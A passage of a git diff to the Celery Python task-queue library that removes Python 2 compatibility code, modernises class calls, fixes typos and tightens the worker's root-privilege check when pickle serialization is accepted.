+ self.exit_code = exit_code
diff --git a/celery/fixups/django.py b/celery/fixups/django.py
index 3064601c473..019e695ea2e 100644
--- a/celery/fixups/django.py
+++ b/celery/fixups/django.py
@@ -37,7 +37,7 @@ def fixup(app, env='DJANGO_SETTINGS_MODULE'):
SETTINGS_MODULE = os.environ.get(env)
if SETTINGS_MODULE and 'django' not in app.loader_cls.lower():
try:
- import django # noqa
+ import django
except ImportError:
warnings.warn(FixupWarning(ERR_NOT_INSTALLED))
else:
diff --git a/celery/loaders/base.py b/celery/loaders/base.py
index ad45bad19e3..17f165d7c03 100644
--- a/celery/loaders/base.py
+++ b/celery/loaders/base.py
@@ -126,6 +126,8 @@ def config_from_object(self, obj, silent=False):
return False
raise
self._conf = force_mapping(obj)
+ if self._conf.get('override_backends') is not None:
+ self.override_backends = self._conf['override_backends']
return True
def _smart_import(self, path, imp=None):
@@ -249,7 +251,7 @@ def autodiscover_tasks(packages, related_name='tasks'):
def find_related_module(package, related_name):
"""Find module in package."""
- # Django 1.7 allows for speciying a class name in INSTALLED_APPS.
+ # Django 1.7 allows for specifying a class name in INSTALLED_APPS.
# (Issue #2248).
try:
module = importlib.import_module(package)
diff --git a/celery/local.py b/celery/local.py
index 5fc32148ac1..6eed19194dd 100644
--- a/celery/local.py
+++ b/celery/local.py
@@ -399,20 +399,11 @@ def getappattr(path):
return current_app._rgetattr(path)
-def _compat_periodic_task_decorator(*args, **kwargs):
- from celery.task import periodic_task
- return periodic_task(*args, **kwargs)
-
-
COMPAT_MODULES = {
'celery': {
'execute': {
'send_task': 'send_task',
},
- 'decorators': {
- 'task': 'task',
- 'periodic_task': _compat_periodic_task_decorator,
- },
'log': {
'get_default_logger': 'log.get_default_logger',
'setup_logger': 'log.setup_logger',
@@ -428,19 +419,6 @@ def _compat_periodic_task_decorator(*args, **kwargs):
'tasks': 'tasks',
},
},
- 'celery.task': {
- 'control': {
- 'broadcast': 'control.broadcast',
- 'rate_limit': 'control.rate_limit',
- 'time_limit': 'control.time_limit',
- 'ping': 'control.ping',
- 'revoke': 'control.revoke',
- 'discard_all': 'control.purge',
- 'inspect': 'control.inspect',
- },
- 'schedules': 'celery.schedules',
- 'chords': 'celery.canvas',
- }
}
#: We exclude these from dir(celery)
@@ -539,8 +517,6 @@ def recreate_module(name, compat_modules=None, by_module=None, direct=None,
operator.add,
[tuple(v) for v in [compat_modules, origins, direct, attrs]],
)))
- if sys.version_info[0] < 3:
- _all = [s.encode() for s in _all]
cattrs = {
'_compat_modules': compat_modules,
'_all_by_module': by_module, '_direct': direct,
diff --git a/celery/platforms.py b/celery/platforms.py
index ebda45c49ca..8af1876fde6 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -11,18 +11,18 @@
import os
import platform as _platform
import signal as _signal
-import struct
import sys
import warnings
from collections import namedtuple
from contextlib import contextmanager
from billiard.compat import close_open_fds, get_fdmax
+from billiard.util import set_pdeathsig as _set_pdeathsig
# fileno used to be in this module
from kombu.utils.compat import maybe_fileno
from kombu.utils.encoding import safe_str
-from .exceptions import SecurityError, reraise
+from .exceptions import SecurityError, SecurityWarning, reraise
from .local import try_import
try:
@@ -67,8 +67,6 @@
_range = namedtuple('_range', ('start', 'stop'))
-C_FORCE_ROOT = os.environ.get('C_FORCE_ROOT', False)
-
ROOT_DISALLOWED = """\
Running a worker with superuser privileges when the
worker accepts messages serialized with pickle is a very bad idea!
@@ -88,6 +86,11 @@
User information: uid={uid} euid={euid} gid={gid} egid={egid}
"""
+ASSUMING_ROOT = """\
+An entry for the specified gid or egid was not found.
+We're assuming this is a potential security issue.
+"""
+
SIGNAMES = {
sig for sig in dir(_signal)
if sig.startswith('SIG') and '_' not in sig
@@ -147,6 +150,7 @@ def acquire(self):
except OSError as exc:
reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2])
return self
+
__enter__ = acquire
def is_locked(self):
@@ -156,6 +160,7 @@ def is_locked(self):
def release(self, *args):
"""Release lock."""
self.remove()
+
__exit__ = release
def read_pid(self):
@@ -232,7 +237,7 @@ def write_pid(self):
rfh.close()
-PIDFile = Pidfile # noqa: E305 XXX compat alias
+PIDFile = Pidfile # XXX compat alias
def create_pidlock(pidfile):
@@ -347,17 +352,19 @@ def open(self):
mputil._run_after_forkers()
self._is_open = True
+
__enter__ = open
def close(self, *args):
if self._is_open:
self._is_open = False
+
__exit__ = close
def _detach(self):
- if os.fork() == 0: # first child
- os.setsid() # create new session
- if os.fork() > 0: # pragma: no cover
+ if os.fork() == 0: # first child
+ os.setsid() # create new session
+ if os.fork() > 0: # pragma: no cover
# second child
os._exit(0)
else:
@@ -464,7 +471,7 @@ def _setgroups_hack(groups):
while 1:
try:
return os.setgroups(groups)
- except ValueError: # error from Python's check.
+ except ValueError: # error from Python's check.
if len(groups) <= 1:
raise
groups[:] = groups[:-1]
@@ -575,6 +582,14 @@ def _setuid(uid, gid):
'non-root user able to restore privileges after setuid.')
+if hasattr(_signal, 'setitimer'):
+ def _arm_alarm(seconds):
+ _signal.setitimer(_signal.ITIMER_REAL, seconds)
+else:
+ def _arm_alarm(seconds):
+ _signal.alarm(math.ceil(seconds))
+
+
class Signals:
"""Convenience interface to :mod:`signals`.
@@ -613,21 +628,8 @@ class Signals:
ignored = _signal.SIG_IGN
default = _signal.SIG_DFL
- if hasattr(_signal, 'setitimer'):
-
- def arm_alarm(self, seconds):
- _signal.setitimer(_signal.ITIMER_REAL, seconds)
- else: # pragma: no cover
- try:
- from itimer import alarm as _itimer_alarm # noqa
- except ImportError:
-
- def arm_alarm(self, seconds): # noqa
- _signal.alarm(math.ceil(seconds))
- else: # pragma: no cover
-
- def arm_alarm(self, seconds): # noqa
- return _itimer_alarm(seconds) # noqa
+ def arm_alarm(self, seconds):
+ return _arm_alarm(seconds)
def reset_alarm(self):
return _signal.alarm(0)
@@ -689,10 +691,10 @@ def update(self, _d_=None, **sigmap):
signals = Signals()
-get_signal = signals.signum # compat
+get_signal = signals.signum # compat
install_signal_handler = signals.__setitem__ # compat
-reset_signal = signals.reset # compat
-ignore_signal = signals.ignore # compat
+reset_signal = signals.reset # compat
+ignore_signal = signals.ignore # compat
def signal_name(signum):
@@ -707,6 +709,16 @@ def strargv(argv):
return ''
+def set_pdeathsig(name):
+ """Sends signal ``name`` to process when parent process terminates."""
+ if signals.supported('SIGKILL'):
+ try:
+ _set_pdeathsig(signals.signum('SIGKILL'))
+ except OSError:
+ # We ignore when OS does not support set_pdeathsig
+ pass
+
+
def set_process_title(progname, info=None):
"""Set the :command:`ps` name for the currently running process.
@@ -725,7 +737,7 @@ def set_mp_process_title(*a, **k):
"""Disabled feature."""
else:
- def set_mp_process_title(progname, info=None, hostname=None): # noqa
+ def set_mp_process_title(progname, info=None, hostname=None):
"""Set the :command:`ps` name from the current process name.
Only works if :pypi:`setproctitle` is installed.
@@ -773,6 +785,11 @@ def ignore_errno(*errnos, **kwargs):
def check_privileges(accept_content):
+ if grp is None or pwd is None:
+ return
+ pickle_or_serialize = ('pickle' in accept_content
+ or 'application/group-python-serialize' in accept_content)
+
uid = os.getuid() if hasattr(os, 'getuid') else 65535
gid = os.getgid() if hasattr(os, 'getgid') else 65535
euid = os.geteuid() if hasattr(os, 'geteuid') else 65535
@@ -780,38 +797,46 @@ def check_privileges(accept_content):
if hasattr(os, 'fchown'):
if not all(hasattr(os, attr)
- for attr in ['getuid', 'getgid', 'geteuid', 'getegid']):
+ for attr in ('getuid', 'getgid', 'geteuid', 'getegid')):
raise SecurityError('suspicious platform, contact support')
- if not uid or not gid or not euid or not egid:
- if ('pickle' in accept_content or
- 'application/x-python-serialize' in accept_content):
- if not C_FORCE_ROOT:
- try:
- print(ROOT_DISALLOWED.format(
- uid=uid, euid=euid, gid=gid, egid=egid,
- ), file=sys.stderr)
- finally:
- sys.stderr.flush()
- os._exit(1)
- warnings.warn(RuntimeWarning(ROOT_DISCOURAGED.format(
- uid=uid, euid=euid, gid=gid, egid=egid,
- )))
+ # Get the group database entry for the current user's group and effective
+ # group id using grp.getgrgid() method
+ # We must handle the case where either the gid or the egid are not found.
+ try:
+ gid_entry = grp.getgrgid(gid)
+ egid_entry = grp.getgrgid(egid)
+ except KeyError:
+ warnings.warn(SecurityWarning(ASSUMING_ROOT))
+ _warn_or_raise_security_error(egid, euid, gid, uid,
+ pickle_or_serialize)
+ return
+ # Get the group and effective group name based on gid
+ gid_grp_name = gid_entry[0]
+ egid_grp_name = egid_entry[0]
-if sys.version_info < (2, 7, 7): # pragma: no cover
- import functools
+ # Create lists to use in validation step later.
+ gids_in_use = (gid_grp_name, egid_grp_name)
+ groups_with_security_risk = ('sudo', 'wheel')
- def _to_bytes_arg(fun):
- @functools.wraps(fun)
- def _inner(s, *args, **kwargs):
- return fun(s.encode(), *args, **kwargs)
- return _inner
+ is_root = uid == 0 or euid == 0
+ # Confirm that the gid and egid are not one that
+ # can be used to escalate privileges.
+ if is_root or any(group in gids_in_use
+ for group in groups_with_security_risk):
+ _warn_or_raise_security_error(egid, euid, gid, uid,
+ pickle_or_serialize)
- pack = _to_bytes_arg(struct.pack)
- unpack = _to_bytes_arg(struct.unpack)
- unpack_from = _to_bytes_arg(struct.unpack_from)
-else:
- pack = struct.pack
- unpack = struct.unpack
- unpack_from = struct.unpack_from
+
+def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize):
+ c_force_root = os.environ.get('C_FORCE_ROOT', False)
+
+ if pickle_or_serialize and not c_force_root:
+ raise SecurityError(ROOT_DISALLOWED.format(
+ uid=uid, euid=euid, gid=gid, egid=egid,
+ ))
+
+ warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format(
+ uid=uid, euid=euid, gid=gid, egid=egid,
+ )))
diff --git a/celery/result.py b/celery/result.py
index 0c10d58e86c..2a78484502e 100644
--- a/celery/result.py
+++ b/celery/result.py
@@ -4,6 +4,7 @@
import time
from collections import deque
from contextlib import contextmanager
+from weakref import proxy
from kombu.utils.objects import cached_property
from vine import Thenable, barrier, promise
@@ -482,7 +483,7 @@ def task_id(self):
"""Compat. alias to :attr:`id`."""
return self.id
- @task_id.setter # noqa
+ @task_id.setter
def task_id(self, id):
self.id = id
@@ -535,7 +536,7 @@ class ResultSet(ResultBase):
def __init__(self, results, app=None, ready_barrier=None, **kwargs):
self._app = app
self.results = results
- self.on_ready = promise(args=(self,))
+ self.on_ready = promise(args=(proxy(self),))
self._on_full = ready_barrier or barrier(results)
if self._on_full:
self._on_full.then(promise(self._on_ready, weak=True))
@@ -851,7 +852,7 @@ def app(self):
return self._app
@app.setter
- def app(self, app): # noqa
+ def app(self, app):
self._app = app
@property
@@ -883,11 +884,11 @@ class GroupResult(ResultSet):
def __init__(self, id=None, results=None, parent=None, **kwargs):
self.id = id
self.parent = parent
- ResultSet.__init__(self, results, **kwargs)
+ super().__init__(results, **kwargs)
def _on_ready(self):
self.backend.remove_pending_result(self)
- ResultSet._on_ready(self)
+ super()._on_ready()
def save(self, backend=None):
"""Save group-result for later retrieval using :meth:`restore`.
diff --git a/celery/schedules.py b/celery/schedules.py
index 3db64e4dab6..3731b747cee 100644
--- a/celery/schedules.py
+++ b/celery/schedules.py
@@ -79,7 +79,7 @@ def maybe_make_aware(self, dt):
def app(self):
return self._app or current_app._get_current_object()
- @app.setter # noqa
+ @app.setter
def app(self, app):
self._app = app
diff --git a/celery/security/__init__.py b/celery/security/__init__.py
index 316ec1db5c1..26237856939 100644
--- a/celery/security/__init__.py
+++ b/celery/security/__init__.py
@@ -5,7 +5,7 @@
from celery.exceptions import ImproperlyConfigured
-from .serialization import register_auth # noqa: need cryptography first
+from .serialization import register_auth # : need cryptography first
CRYPTOGRAPHY_NOT_INSTALLED = """\
You need to install the cryptography library to use the auth serializer.
diff --git a/celery/security/certificate.py b/celery/security/certificate.py
index fc4961cec74..0c31bb79f31 100644
--- a/celery/security/certificate.py
+++ b/celery/security/certificate.py
@@ -27,7 +27,7 @@ def __init__(self, cert):
def has_expired(self):
"""Check if the certificate has expired."""
- return datetime.datetime.now() > self._cert.not_valid_after
+ return datetime.datetime.utcnow() >= self._cert.not_valid_after
def get_pubkey(self):
"""Get public key from certificate."""
@@ -85,7 +85,7 @@ class FSCertStore(CertStore):
"""File system certificate store."""
def __init__(self, path):
- CertStore.__init__(self)
+ super().__init__()
if os.path.isdir(path):
path = os.path.join(path, '*')
for p in glob.glob(path):
diff --git a/celery/utils/collections.py b/celery/utils/collections.py
index b9dbf826fa3..df37d12c3b4 100644
--- a/celery/utils/collections.py
+++ b/celery/utils/collections.py
@@ -1,5 +1,4 @@
"""Custom maps, sets, sequences, and other data structures."""
-import sys
import time
from collections import OrderedDict as _OrderedDict
from collections import deque
@@ -8,6 +7,7 @@
from heapq import heapify, heappop, heappush
from itertools import chain, count
from queue import Empty
+from typing import Any, Dict, Iterable, List
from .functional import first, uniq
from .text import match_case
@@ -21,9 +21,9 @@
try:
from django.utils.functional import LazyObject, LazySettings
except ImportError:
- class LazyObject: # noqa
+ class LazyObject:
pass
- LazySettings = LazyObject # noqa
+ LazySettings = LazyObject
__all__ = (
'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap',
@@ -193,26 +193,12 @@ def _iterate_values(self):
yield getattr(self.obj, key)
itervalues = _iterate_values
- if sys.version_info[0] == 3: # pragma: no cover
- items = _iterate_items
- keys = _iterate_keys
- values = _iterate_values
- else:
+ items = _iterate_items
+ keys = _iterate_keys
+ values = _iterate_values
- def keys(self):
- # type: () -> List[Any]
- return list(self)
- def items(self):
- # type: () -> List[Tuple[Any, Any]]
- return list(self._iterate_items())
-
- def values(self):
- # type: () -> List[Any]
- return list(self._iterate_values())
-
-
-MutableMapping.register(DictAttribute) # noqa: E305
+MutableMapping.register(DictAttribute)
class ChainMap(MutableMapping):
@@ -340,7 +326,7 @@ def _iter(self, op):
# changes take precedence.
# pylint: disable=bad-reversed-sequence
# Someone should teach pylint about properties.
- return chain(*[op(d) for d in reversed(self.maps)])
+ return chain(*(op(d) for d in reversed(self.maps)))
def _iterate_keys(self):
# type: () -> Iterable
@@ -360,23 +346,9 @@ def _iterate_values(self):
def bind_to(self, callback):
self._observers.append(callback)
- if sys.version_info[0] == 3: # pragma: no cover
- keys = _iterate_keys
- items = _iterate_items
- values = _iterate_values
-
- else: # noqa
- def keys(self):
- # type: () -> List[Any]
- return list(self._iterate_keys())
-
- def items(self):
- # type: () -> List[Tuple[Any, Any]]
- return list(self._iterate_items())
-
- def values(self):
- # type: () -> List[Any]
- return list(self._iterate_values())
+ keys = _iterate_keys
+ items = _iterate_items
+ values = _iterate_values
class ConfigurationView(ChainMap, AttributeDictMixin):
@@ -696,7 +668,7 @@ def _heap_overload(self):
return len(self._heap) * 100 / max(len(self._data), 1) - 100
-MutableSet.register(LimitedSet) # noqa: E305
+MutableSet.register(LimitedSet)
class Evictable:
@@ -797,7 +769,7 @@ def _evictcount(self):
return len(self)
-Sequence.register(Messagebuffer) # noqa: E305
+Sequence.register(Messagebuffer)
class BufferMap(OrderedDict, Evictable):
diff --git a/celery/utils/debug.py b/celery/utils/debug.py
index 0641f1d6c92..3515dc84f9b 100644
--- a/celery/utils/debug.py
+++ b/celery/utils/debug.py
@@ -12,7 +12,7 @@
try:
from psutil import Process
except ImportError:
- Process = None # noqa
+ Process = None
__all__ = (
'blockdetection', 'sample_mem', 'memdump', 'sample',
diff --git a/celery/utils/dispatch/signal.py b/celery/utils/dispatch/signal.py
index b12759c4f37..0cfa6127ed0 100644
--- a/celery/utils/dispatch/signal.py
+++ b/celery/utils/dispatch/signal.py
@@ -254,9 +254,9 @@ def has_listeners(self, sender=None):
def send(self, sender, **named):
"""Send signal from sender to all connected receivers.
- If any receiver raises an error, the error propagates back through
- send, terminating the dispatch loop, so it is quite possible to not
- have all receivers called if a raises an error.
+ If any receiver raises an error, the exception is returned as the
+ corresponding response. (This is different from the "send" in
+ Django signals. In Celery "send" and "send_robust" do the same thing.)
Arguments:
sender (Any): The sender of the signal.
diff --git a/celery/utils/functional.py b/celery/utils/functional.py
index b28e4a3ba48..e8a8453cc6e 100644
--- a/celery/utils/functional.py
+++ b/celery/utils/functional.py
@@ -1,9 +1,9 @@
-"""Functional-style utilties."""
+"""Functional-style utilities."""
import inspect
import sys
from collections import UserList
from functools import partial
-from itertools import chain, islice
+from itertools import islice, tee, zip_longest
from kombu.utils.functional import (LRUCache, dictfilter, is_list, lazy,
maybe_evaluate, maybe_list, memoize)
@@ -90,6 +90,7 @@ def firstmethod(method, on_call=None):
The list can also contain lazy instances
(:class:`~kombu.utils.functional.lazy`.)
"""
+
def _matcher(it, *args, **kwargs):
for obj in it:
try:
@@ -101,6 +102,7 @@ def _matcher(it, *args, **kwargs):
else:
if reply is not None:
return reply
+
return _matcher
@@ -160,6 +162,19 @@ def uniq(it):
return (seen.add(obj) or obj for obj in it if obj not in seen)
+def lookahead(it):
+ """Yield pairs of (current, next) items in `it`.
+
+ `next` is None if `current` is the last item.
+ Example:
+ >>> list(lookahead(x for x in range(6)))
+ [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)]
+ """
+ a, b = tee(it)
+ next(b, None)
+ return zip_longest(a, b)
+
+
def regen(it):
"""Convert iterator to an object that can be consumed multiple times.
@@ -180,8 +195,8 @@ def __init__(self, it):
# UserList creates a new list and sets .data, so we don't
# want to call init here.
self.__it = it
- self.__index = 0
self.__consumed = []
+ self.__done = False
def __reduce__(self):
return list, (self.data,)
@@ -189,31 +204,71 @@ def __reduce__(self):
def __length_hint__(self):
return self.__it.__length_hint__()
+ def __lookahead_consume(self, limit=None):
+ if not self.__done and (limit is None or limit > 0):
+ it = iter(self.__it)
+ try:
+ now = next(it)
+ except StopIteration:
+ return
+ self.__consumed.append(now)
+ # Maintain a single look-ahead to ensure we set `__done` when the
+ # underlying iterator gets exhausted
+ while not self.__done:
+ try:
+ next_ = next(it)
+ self.__consumed.append(next_)
+ except StopIteration:
+ self.__done = True
+ break
+ finally:
+ yield now
+ now = next_
+ # We can break out when `limit` is exhausted
+ if limit is not None:
+ limit -= 1
+ if limit <= 0:
+ break
+
def __iter__(self):
- return chain(self.__consumed, self.__it)
+ yield from self.__consumed
+ yield from self.__lookahead_consume()
def __getitem__(self, index):
if index < 0:
return self.data[index]
+ # Consume elements up to the desired index prior to attempting to
+ # access it from within `__consumed`
+ consume_count = index - len(self.__consumed) + 1
+ for _ in self.__lookahead_consume(limit=consume_count):
+ pass
+ return self.__consumed[index]
+
+ def __bool__(self):
+ if len(self.__consumed):
+ return True
+
try:
- return self.__consumed[index]
- except IndexError:
- try:
- for _ in range(self.__index, index + 1):
- self.__consumed.append(next(self.__it))
- except StopIteration:
- raise IndexError(index)
- else:
- return self.__consumed[index]
+ next(iter(self))
+ except StopIteration:
+ return False
+ else:
+ return True
@property
def data(self):
- try:
- self.__consumed.extend(list(self.__it))
- except StopIteration:
- pass
+ if not self.__done:
+ self.__consumed.extend(self.__it)
+ self.__done = True
return self.__consumed
+ def __repr__(self):
+ return "<{}: [{}{}]>".format(
+ self.__class__.__name__,
+ ", ".join(repr(e) for e in self.__consumed),
+ "..." if not self.__done else "",
+ )
+
def _argsfromspec(spec, replace_defaults=True):
if spec.defaults:
@@ -228,11 +283,11 @@ def _argsfromspec(spec, replace_defaults=True):
varargs = spec.varargs
varkw = spec.varkw
if spec.kwonlydefaults:
- split = len(spec.kwonlydefaults)
- kwonlyargs = spec.kwonlyargs[:-split]
+ kwonlyargs = set(spec.kwonlyargs) - set(spec.kwonlydefaults.keys())
if replace_defaults:
kwonlyargs_optional = [
- (kw, i) for i, kw in enumerate(spec.kwonlyargs[-split:])]
+ (kw, i) for i, kw in enumerate(spec.kwonlydefaults.keys())
+ ]
else:
kwonlyargs_optional = list(spec.kwonlydefaults.items())
else:
@@ -296,24 +351,12 @@ def fun_takes_argument(name, fun, position=None):
)
-if hasattr(inspect, 'signature'):
- def fun_accepts_kwargs(fun):
- """Return true if function accepts arbitrary keyword arguments."""
- return any(
- p for p in inspect.signature(fun).parameters.values()
- if p.kind == p.VAR_KEYWORD
- )
-else:
- def fun_accepts_kwargs(fun): # noqa
- """Return true if function accepts arbitrary keyword arguments."""
- try:
- argspec = inspect.getargspec(fun)
- except TypeError:
- try:
- argspec = inspect.getargspec(fun.__call__)
- except (TypeError, AttributeError):
- return
- return not argspec or argspec[2] is not None
+def fun_accepts_kwargs(fun):
+ """Return true if function accepts arbitrary keyword arguments."""
+ return any(
+ p for p in inspect.signature(fun).parameters.values()
+ if p.kind == p.VAR_KEYWORD
+ )
def maybe(typ, val):
diff --git a/celery/utils/imports.py b/celery/utils/imports.py
index fd9009c32ac..0303bd3c051 100644
--- a/celery/utils/imports.py
+++ b/celery/utils/imports.py
@@ -25,21 +25,14 @@ class NotAPackage(Exception):
"""Raised when importing a package, but it's not a package."""
-if sys.version_info > (3, 3): # pragma: no cover
- def qualname(obj):
- """Return object name."""
- if not hasattr(obj, '__name__') and hasattr(obj, '__class__'):
- obj = obj.__class__
- q = getattr(obj, '__qualname__', None)
- if '.' not in q:
- q = '.'.join((obj.__module__, q))
- return q
-else:
- def qualname(obj): # noqa
- """Return object name."""
- if not hasattr(obj, '__name__') and hasattr(obj, '__class__'):
- obj = obj.__class__
- return '.'.join((obj.__module__, obj.__name__))
+def qualname(obj):
+ """Return object name."""
+ if not hasattr(obj, '__name__') and hasattr(obj, '__class__'):
+ obj = obj.__class__
+ q = getattr(obj, '__qualname__', None)
+ if '.' not in q:
+ q = '.'.join((obj.__module__, q))
+ return q
def instantiate(name, *args, **kwargs):
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 6acff167fcf..668094c5ce5 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -6,6 +6,7 @@
import threading
import traceback
from contextlib import contextmanager
+from typing import AnyStr, Sequence
from kombu.log import LOG_LEVELS
from kombu.log import get_logger as _get_logger
@@ -132,17 +133,17 @@ class ColorFormatter(logging.Formatter):
}
def __init__(self, fmt=None, use_color=True):
- logging.Formatter.__init__(self, fmt)
+ super().__init__(fmt)
self.use_color = use_color
def formatException(self, ei):
if ei and not isinstance(ei, tuple):
ei = sys.exc_info()
- r = logging.Formatter.formatException(self, ei)
+ r = super().formatException(ei)
return r
def format(self, record):
- msg = logging.Formatter.format(self, record)
+ msg = super().format(record)
color = self.colors.get(record.levelname)
# reset exception info later for other handlers...
@@ -167,7 +168,7 @@ def format(self, record):
),
)
try:
- return logging.Formatter.format(self, record)
+ return super().format(record)
finally:
record.msg, record.exc_info = prev_msg, einfo
else:
@@ -214,19 +215,25 @@ def handleError(self, record):
return [wrap_handler(h) for h in self.logger.handlers]
def write(self, data):
+ # type: (AnyStr) -> int
"""Write message to logging object."""
if _in_sighandler:
- return print(safe_str(data), file=sys.__stderr__)
+ safe_data = safe_str(data)
+ print(safe_data, file=sys.__stderr__)
+ return len(safe_data)
if getattr(self._thread, 'recurse_protection', False):
# Logger is logging back to this file, so stop recursing.
- return
- data = data.strip()
+ return 0
if data and not self.closed:
self._thread.recurse_protection = True
try:
- self.logger.log(self.loglevel, safe_str(data))
+ safe_data = safe_str(data).rstrip('\n')
+ if safe_data:
+ self.logger.log(self.loglevel, safe_data)
+ return len(safe_data)
finally:
self._thread.recurse_protection = False
+ return 0
def writelines(self, sequence):
# type: (Sequence[str]) -> None
diff --git a/celery/utils/saferepr.py b/celery/utils/saferepr.py
index e07b979e879..adcfc72efca 100644
--- a/celery/utils/saferepr.py
+++ b/celery/utils/saferepr.py
@@ -15,6 +15,8 @@
from itertools import chain
from numbers import Number
from pprint import _recursion
+from typing import (Any, AnyStr, Callable, Dict, Iterator, List, Sequence,
+ Set, Tuple)
from .text import truncate
@@ -100,7 +102,7 @@ def _chainlist(it, LIT_LIST_SEP=LIT_LIST_SEP):
def _repr_empty_set(s):
# type: (Set) -> str
- return '{}()'.format(type(s).__name__)
+ return f'{type(s).__name__}()'
def _safetext(val):
@@ -191,7 +193,7 @@ def _saferepr(o, maxlen=None, maxlevels=3, seen=None):
def _reprseq(val, lit_start, lit_end, builtin_type, chainer):
# type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...]
- if type(val) is builtin_type: # noqa
+ if type(val) is builtin_type:
return lit_start, lit_end, chainer(val)
return (
_literal(f'{type(val).__name__}({lit_start.value}', False, +1),
diff --git a/celery/utils/serialization.py b/celery/utils/serialization.py
index af7804a2132..c03a20f9419 100644
--- a/celery/utils/serialization.py
+++ b/celery/utils/serialization.py
@@ -13,7 +13,7 @@
try:
import cPickle as pickle
except ImportError:
- import pickle # noqa
+ import pickle
__all__ = (
'UnpickleableExceptionWrapper', 'subclass_exception',
@@ -30,7 +30,7 @@
'on': True, 'off': False}
-def subclass_exception(name, parent, module): # noqa
+def subclass_exception(name, parent, module):
"""Create new exception class."""
return type(name, (parent,), {'__module__': module})
@@ -133,8 +133,8 @@ def __init__(self, exc_module, exc_cls_name, exc_args, text=None):
self.exc_cls_name = exc_cls_name
self.exc_args = safe_exc_args
self.text = text
- Exception.__init__(self, exc_module, exc_cls_name, safe_exc_args,
- text)
+ super().__init__(exc_module, exc_cls_name, safe_exc_args,
+ text)
def restore(self):
return create_exception_cls(self.exc_cls_name,
diff --git a/celery/utils/sysinfo.py b/celery/utils/sysinfo.py
index 7032d4de885..57425dd8173 100644
--- a/celery/utils/sysinfo.py
+++ b/celery/utils/sysinfo.py
@@ -14,7 +14,7 @@ def _load_average():
else: # pragma: no cover
# Windows doesn't have getloadavg
- def _load_average(): # noqa
+ def _load_average():
return (0.0, 0.0, 0.0)
diff --git a/celery/utils/text.py b/celery/utils/text.py
index b90e8a21b45..8f4a321eebb 100644
--- a/celery/utils/text.py
+++ b/celery/utils/text.py
@@ -5,6 +5,7 @@
from functools import partial
from pprint import pformat
from textwrap import fill
+from typing import Any, List, Mapping, Pattern
__all__ = (
'abbr', 'abbrtask', 'dedent', 'dedent_initial',
@@ -32,13 +33,13 @@ def str_to_list(s):
def dedent_initial(s, n=4):
# type: (str, int) -> str
- """Remove identation from first line of text."""
+ """Remove indentation from first line of text."""
return s[n:] if s[:n] == ' ' * n else s
def dedent(s, n=4, sep='\n'):
# type: (str, int, str) -> str
- """Remove identation."""
+ """Remove indentation."""
return sep.join(dedent_initial(l) for l in s.splitlines())
@@ -111,7 +112,7 @@ def pretty(value, width=80, nl_width=80, sep='\n', **kw):
# type: (str, int, int, str, **Any) -> str
"""Format value for printing to console."""
if isinstance(value, dict):
- return '{{{0} {1}'.format(sep, pformat(value, 4, nl_width)[1:])
+ return f'{{{sep} {pformat(value, 4, nl_width)[1:]}'
elif isinstance(value, tuple):
return '{}{}{}'.format(
sep, ' ' * 4, pformat(value, width=nl_width, **kw),
diff --git a/celery/utils/threads.py b/celery/utils/threads.py
index 68c12fd1093..94c6f617c40 100644
--- a/celery/utils/threads.py
+++ b/celery/utils/threads.py
@@ -13,15 +13,15 @@
from greenlet import getcurrent as get_ident
except ImportError: # pragma: no cover
try:
- from _thread import get_ident # noqa
+ from _thread import get_ident
except ImportError:
try:
- from thread import get_ident # noqa
+ from thread import get_ident
except ImportError: # pragma: no cover
try:
- from _dummy_thread import get_ident # noqa
+ from _dummy_thread import get_ident
except ImportError:
- from dummy_thread import get_ident # noqa
+ from dummy_thread import get_ident
__all__ = (
@@ -46,8 +46,8 @@ class bgThread(threading.Thread):
def __init__(self, name=None, **kwargs):
super().__init__()
- self._is_shutdown = threading.Event()
- self._is_stopped = threading.Event()
+ self.__is_shutdown = threading.Event()
+ self.__is_stopped = threading.Event()
self.daemon = True
self.name = name or self.__class__.__name__
@@ -60,7 +60,7 @@ def on_crash(self, msg, *fmt, **kwargs):
def run(self):
body = self.body
- shutdown_set = self._is_shutdown.is_set
+ shutdown_set = self.__is_shutdown.is_set
try:
while not shutdown_set():
try:
@@ -77,7 +77,7 @@ def run(self):
def _set_stopped(self):
try:
- self._is_stopped.set()
+ self.__is_stopped.set()
except TypeError: # pragma: no cover
# we lost the race at interpreter shutdown,
# so gc collected built-in modules.
@@ -85,8 +85,8 @@ def _set_stopped(self):
def stop(self):
"""Graceful shutdown."""
- self._is_shutdown.set()
- self._is_stopped.wait()
+ self.__is_shutdown.set()
+ self.__is_stopped.wait()
if self.is_alive():
self.join(THREAD_TIMEOUT_MAX)
@@ -282,7 +282,7 @@ def __init__(self, locals=None, ident_func=None):
def get_ident(self):
"""Return context identifier.
- This is the indentifer the local objects use internally
+ This is the identifier the local objects use internally
for this context. You cannot override this method to change the
behavior but use it to link other context local objects (such as
SQLAlchemy's scoped sessions) to the Werkzeug locals.
@@ -328,4 +328,4 @@ def __len__(self):
# since each thread has its own greenlet we can just use those as
# identifiers for the context. If greenlets aren't available we
# fall back to the current thread ident.
- LocalStack = _LocalStack # noqa
+ LocalStack = _LocalStack
diff --git a/celery/utils/time.py b/celery/utils/time.py
index 55f7fce732c..c898b90e93a 100644
--- a/celery/utils/time.py
+++ b/celery/utils/time.py
@@ -66,7 +66,7 @@ def __init__(self):
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
- tzinfo.__init__(self)
+ super().__init__()
def __repr__(self):
return f''
diff --git a/celery/utils/timer2.py b/celery/utils/timer2.py
index 07f4b288a9e..88d8ffd77ad 100644
--- a/celery/utils/timer2.py
+++ b/celery/utils/timer2.py
@@ -48,13 +48,17 @@ def __init__(self, schedule=None, on_error=None, on_tick=None,
max_interval=max_interval)
self.on_start = on_start
self.on_tick = on_tick or self.on_tick
- threading.Thread.__init__(self)
- self._is_shutdown = threading.Event()
- self._is_stopped = threading.Event()
+ super().__init__()
+ # `_is_stopped` is likely to be an attribute on `Thread` objects so we
